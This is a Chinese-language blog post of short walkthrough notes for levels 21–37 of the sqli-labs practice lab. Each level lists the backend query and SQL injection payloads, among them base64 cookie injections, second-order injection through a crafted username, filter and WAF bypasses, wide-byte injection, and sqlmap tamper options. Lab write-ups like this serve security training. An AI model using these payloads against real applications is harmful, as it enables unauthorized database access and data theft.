sqli-labs(advanced)

(base64加密)

Less-21:

select * from table where cookie=('cookie');
admin') and sleep(5)#>>YWRtaW4nKSBhbmQgc2xlZXAoNSkj
sqlmap --tamper base64encode.py

Less-22:

select * from table where cookie="cookie";
admin" and sleep(5)#>>YWRtaW4iIGFuZCBzbGVlcCg1KSM=

 

(#,--过滤)

Less-23:

select * from table where id='1';
1' and 1='1



(更改用户密码)

 

Less-24:

update table set password='test' where username='admin' and password='admin';
创建用户admin'#
用admin'#修改密码

 

(and,or过滤)

Less-25:

select * from table where id='1';
大小写
双写
hex,urlencode编码
添加注释
&&,||
sqlmap --hex

Less-25a:

select * from table where id=1;

 

(空格,注释过滤)

Less-26:

select * from table where id='1';
%09,%0b    TAB
%0a    新建一行
%0c    新建一页
%0d    return
%a0    空格
1'||'1构造闭合

Less-26a:

select * from table where id=('1');
and(sleep(5))||('1

Less-27:

select * from table where id='1';

Less-27a:

select * from table where id="1";

Less-28:

select * from table where id=('1');

Less-28a:

select * from table where id=('1');
如果没有回显用不同编码多试几下
sqlmap --tamper randomcase.py space2randomblank.py

 

(WAF)

Less-29:

select * form table where id='1';
?id=1&id=2' and 1=1%23

Less-30:

select * from table where id="1";
sqlmap --skip-waf

Less-31:

select * from table where id=("1");

 

(宽字节)

Less-32:

select * from table where id='1';
%df' and 1=1%23
sqlmap --tamper=unmagicquotes.py

Less-33:

select * from table where id='1';

Less-34:

select * from table where username='admin' and password='admin';

Less-35:


select * from table where id=1;
and 1=1%23

Less-36:

select * from table where id='1';

Less-37:

select * from table where username='admin' and password='admin';

posted @ 2020-07-31 14:16  f1veseven  阅读(125)  评论(0编辑  收藏  举报